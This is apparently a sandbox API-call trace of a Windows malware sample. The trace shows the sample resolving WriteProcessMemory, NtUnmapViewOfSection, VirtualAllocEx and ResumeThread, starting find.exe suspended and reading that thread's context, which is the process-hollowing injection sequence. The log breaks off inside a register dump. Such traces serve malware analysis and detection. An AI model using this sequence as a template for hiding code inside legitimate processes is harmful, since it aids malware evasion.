GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74eb0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="shell32.dll") returned 0xb [0109.161] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74eb0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0109.162] GetModuleInformation (in: hProcess=0x32c, hModule=0x76800000, lpmodinfo=0x2446e54, cb=0xc | out: lpmodinfo=0x2446e54*(lpBaseOfDll=0x76800000, SizeOfImage=0x37000, EntryPoint=0x76803b50)) returned 1 [0109.163] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76800000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="cfgmgr32.dll") returned 0xc [0109.163] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76800000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0109.164] GetModuleInformation (in: hProcess=0x32c, hModule=0x745b0000, lpmodinfo=0x2448f68, cb=0xc | out: lpmodinfo=0x2448f68*(lpBaseOfDll=0x745b0000, SizeOfImage=0x4f9000, EntryPoint=0x747b7610)) returned 1 [0109.165] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x745b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="windows.storage.dll") returned 0x13 [0109.165] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x745b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")) returned 0x27 [0109.166] GetModuleInformation (in: hProcess=0x32c, hModule=0x74520000, lpmodinfo=0x244b094, cb=0xc | out: lpmodinfo=0x244b094*(lpBaseOfDll=0x74520000, SizeOfImage=0x8d000, EntryPoint=0x74569b90)) returned 1 [0109.167] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74520000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="shcore.dll") returned 0xa [0109.168] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74520000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shcore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")) returned 0x1e [0109.168] GetModuleInformation (in: hProcess=0x32c, hModule=0x76470000, lpmodinfo=0x244d1a0, cb=0xc | out: lpmodinfo=0x244d1a0*(lpBaseOfDll=0x76470000, SizeOfImage=0x44000, EntryPoint=0x76477410)) returned 1 [0109.169] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76470000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="powrprof.dll") returned 0xc [0109.170] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76470000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")) returned 0x20 [0109.170] GetModuleInformation (in: hProcess=0x32c, hModule=0x73f20000, lpmodinfo=0x244f2b4, cb=0xc | out: lpmodinfo=0x244f2b4*(lpBaseOfDll=0x73f20000, SizeOfImage=0xf000, EntryPoint=0x73f22e40)) returned 1 [0109.171] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73f20000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0109.172] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73f20000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")) returned 0x1f [0109.173] CloseHandle (hObject=0x32c) returned 1 [0109.174] GetProcAddress (hModule=0x76720000, lpProcName="WriteProcessMemory") returned 0x76762850 [0109.175] GetCurrentProcessId () returned 0x139c [0109.175] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x139c) returned 0x32c [0109.175] EnumProcessModules (in: hProcess=0x32c, lphModule=0x24534bc, cb=0x100, lpcbNeeded=0x19eae0 | out: lphModule=0x24534bc, lpcbNeeded=0x19eae0) returned 1 [0109.175] GetModuleInformation (in: hProcess=0x32c, hModule=0x400000, lpmodinfo=0x24535fc, cb=0xc | out: lpmodinfo=0x24535fc*(lpBaseOfDll=0x400000, SizeOfImage=0x178000, EntryPoint=0x0)) returned 1 [0109.176] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x400000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe") returned 0x44 [0109.176] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x400000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe")) returned 0x62 [0109.176] GetModuleInformation (in: hProcess=0x32c, hModule=0x771d0000, lpmodinfo=0x2455820, cb=0xc | out: lpmodinfo=0x2455820*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0109.176] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x771d0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0109.176] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x771d0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0109.176] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f8b0000, lpmodinfo=0x2457924, cb=0xc | out: lpmodinfo=0x2457924*(lpBaseOfDll=0x6f8b0000, SizeOfImage=0x59000, EntryPoint=0x6f8c0780)) returned 1 [0109.241] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f8b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0109.242] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f8b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0109.242] GetModuleInformation (in: hProcess=0x32c, hModule=0x76720000, lpmodinfo=0x2459a30, cb=0xc | out: lpmodinfo=0x2459a30*(lpBaseOfDll=0x76720000, SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0109.242] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76720000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0109.242] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76720000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0109.243] GetModuleInformation (in: hProcess=0x32c, hModule=0x76910000, lpmodinfo=0x245bb44, cb=0xc | out: lpmodinfo=0x245bb44*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0109.243] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76910000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0109.243] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76910000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0109.243] GetModuleInformation (in: hProcess=0x32c, hModule=0x73e50000, lpmodinfo=0x245dc8c, cb=0xc | out: lpmodinfo=0x245dc8c*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0109.244] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73e50000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0109.244] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73e50000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0109.244] GetModuleInformation (in: hProcess=0x32c, hModule=0x76600000, lpmodinfo=0x245fd98, cb=0xc | out: lpmodinfo=0x245fd98*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0109.244] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76600000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0109.245] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76600000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0109.245] GetModuleInformation (in: hProcess=0x32c, hModule=0x76a90000, lpmodinfo=0x2461eac, cb=0xc | out: lpmodinfo=0x2461eac*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0109.245] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76a90000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0109.245] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76a90000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0109.246] GetModuleInformation (in: hProcess=0x32c, hModule=0x76cb0000, lpmodinfo=0x2463fb8, cb=0xc | out: lpmodinfo=0x2463fb8*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0109.246] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76cb0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0109.246] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76cb0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0109.247] GetModuleInformation (in: hProcess=0x32c, hModule=0x76c00000, lpmodinfo=0x2466110, cb=0xc | out: lpmodinfo=0x2466110*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0109.247] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76c00000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0109.247] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76c00000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0109.247] GetModuleInformation (in: hProcess=0x32c, hModule=0x73f00000, lpmodinfo=0x246821c, cb=0xc | out: lpmodinfo=0x246821c*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0109.248] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73f00000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0109.248] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73f00000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0109.248] GetModuleInformation (in: hProcess=0x32c, hModule=0x73ef0000, lpmodinfo=0x246a328, cb=0xc | out: lpmodinfo=0x246a328*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0109.249] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73ef0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0109.249] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73ef0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0109.249] GetModuleInformation (in: hProcess=0x32c, hModule=0x76840000, lpmodinfo=0x246c43c, cb=0xc | out: lpmodinfo=0x246c43c*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0109.250] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76840000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0109.250] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76840000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0109.251] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f910000, lpmodinfo=0x246e570, cb=0xc | out: lpmodinfo=0x246e570*(lpBaseOfDll=0x6f910000, SizeOfImage=0x7d000, EntryPoint=0x6f920db0)) returned 1 [0109.251] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f910000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0109.251] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f910000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0109.252] GetModuleInformation (in: hProcess=0x32c, hModule=0x76d00000, lpmodinfo=0x24706b8, cb=0xc | out: lpmodinfo=0x24706b8*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0109.252] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76d00000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0109.253] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76d00000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0109.253] GetModuleInformation (in: hProcess=0x32c, hModule=0x762b0000, lpmodinfo=0x24727c4, cb=0xc | out: lpmodinfo=0x24727c4*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0109.253] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x762b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0109.254] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x762b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0109.254] GetModuleInformation (in: hProcess=0x32c, hModule=0x74ab0000, lpmodinfo=0x24748d0, cb=0xc | out: lpmodinfo=0x24748d0*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0109.255] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74ab0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0109.255] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74ab0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0109.256] GetModuleInformation (in: hProcess=0x32c, hModule=0x743d0000, lpmodinfo=0x2476a60, cb=0xc | out: lpmodinfo=0x2476a60*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 [0109.256] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x743d0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0109.256] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x743d0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0109.257] GetModuleInformation (in: hProcess=0x32c, hModule=0x741b0000, lpmodinfo=0x2478b6c, cb=0xc | out: lpmodinfo=0x2478b6c*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 1 [0109.257] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x741b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0109.258] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x741b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0109.258] GetModuleInformation (in: hProcess=0x32c, hModule=0x76d50000, lpmodinfo=0x247ac70, cb=0xc | out: lpmodinfo=0x247ac70*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0109.259] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76d50000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0109.259] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76d50000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0109.260] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f8a0000, lpmodinfo=0x247cd9c, cb=0xc | out: lpmodinfo=0x247cd9c*(lpBaseOfDll=0x6f8a0000, SizeOfImage=0x8000, EntryPoint=0x6f8a17b0)) returned 1 [0109.260] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f8a0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0109.261] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f8a0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0109.273] CloseHandle (hObject=0x32c) returned 1 [0109.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NtUnmapViewOfSection", cchWideChar=20, lpMultiByteStr=0x19eac0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NtUnmapViewOfSection%\x1a2\x02b\x84Hó(ú\x1bo@î\x19", lpUsedDefaultChar=0x0) returned 20 [0109.274] GetProcAddress (hModule=0x771d0000, lpProcName="NtUnmapViewOfSection") returned 0x77246f40 [0109.275] GetCurrentProcessId () returned 0x139c [0109.275] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x139c) returned 0x32c [0109.298] CloseHandle (hObject=0x32c) returned 1 [0109.298] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAllocEx") returned 0x76762730 [0109.299] GetCurrentProcessId () returned 0x139c [0109.299] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x139c) returned 0x32c [0109.320] CloseHandle (hObject=0x32c) returned 1 [0109.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResumeThread", cchWideChar=12, lpMultiByteStr=0x19eac8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResumeThread%\x1a2\x02b\x84Hó(ú\x1bo@î\x19", lpUsedDefaultChar=0x0) returned 12 [0109.321] GetProcAddress (hModule=0x76720000, lpProcName="ResumeThread") returned 0x7673a800 [0109.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SysWOW64\\find.exe", cchWideChar=28, lpMultiByteStr=0x19ed48, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SysWOW64\\find.exeÉ\x1f2\x02b\x84Hó(ú\x1boðó\x19", lpUsedDefaultChar=0x0) returned 28 [0109.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\"C:\\Windows\\SysWOW64\\find.exe\"", cchWideChar=30, lpMultiByteStr=0x19ed28, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\"C:\\Windows\\SysWOW64\\find.exe\"\x19", lpUsedDefaultChar=0x0) returned 30 [0109.397] CreateProcessA (in: lpApplicationName="C:\\Windows\\SysWOW64\\find.exe", lpCommandLine="\"C:\\Windows\\SysWOW64\\find.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19ed9c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2546738 | out: lpCommandLine="\"C:\\Windows\\SysWOW64\\find.exe\"", lpProcessInformation=0x2546738*(hProcess=0x330, hThread=0x32c, dwProcessId=0x10a0, dwThreadId=0xb1c)) returned 1 [0109.590] CoTaskMemFree (pv=0x0) [0109.604] GetThreadContext (in: hThread=0x32c, lpContext=0x255100c | out: lpContext=0x255100c*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x3a6000, Edx=0x0, Ecx=0x0, Eax=0xb823c0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, 